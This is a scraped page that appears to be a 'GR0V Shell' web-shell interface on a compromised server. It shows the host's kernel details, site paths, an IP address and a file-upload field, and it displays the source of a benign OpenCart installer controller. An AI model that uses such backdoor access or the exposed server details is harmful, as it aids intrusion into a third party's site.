? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/public_html_bk/opencart/install11/controller/
File Upload :
Current File : /home/admin/domains/happytokorea.com/public_html_bk/opencart/install11/controller/upgrade.php

<?php
class ControllerUpgrade extends Controller {
	private $error = array();

	public function index() {

		if (isset($this->error['warning'])) {
			$this->data['error_warning'] = $this->error['warning'];
		} else {
			$this->data['error_warning'] = '';
		}

		$this->data['action'] = HTTP_SERVER . 'index.php?route=upgrade/upgrade';

		$this->template = 'upgrade.tpl';
		$this->children = array(
			'header',
			'footer'
		);

		$this->response->setOutput($this->render());

	}

	public function success() {

		$this->template = 'success.tpl';
		$this->children = array(
			'header',
			'footer'
		);

		$this->response->setOutput($this->render());

	}

	public function upgrade() {

		if ($this->validate()) {

			$this->load->model('upgrade');

			$this->model_upgrade->mysql($this->request->post, 'upgrade.sql');
			
			$this->model_upgrade->modifications();

			$this->redirect(HTTP_SERVER . 'index.php?route=upgrade/success');
		} else {
			die($this->error['warning']);
		}

	}

	private function validate() {

		if (!defined('DB_HOSTNAME')) {
			$this->error['warning'] = 'Host required!';
		}

		if (!defined('DB_USERNAME')) {
			$this->error['warning'] = 'User required!';
		}

		if (!defined('DB_DATABASE')) {
			$this->error['warning'] = 'Database Name required!';
		}

		if (!$connection = @mysql_connect(DB_HOSTNAME, DB_USERNAME, DB_PASSWORD)) {
			$this->error['warning'] = 'Error: Could not connect to the database please make sure the database server, username and password is correct in the config.php file!';
		} else {
			if (!@mysql_select_db(DB_DATABASE, $connection)) {
				$this->error['warning'] = 'Error: Database "'. DB_DATABASE . '" does not exist!';
			}

			mysql_close($connection);
		}

    	if (!$this->error) {
      		return true;
    	} else {
      		return false;
    	}
	}
}
?>

T1KUS90T
  root-grov@210.1.60.28:~$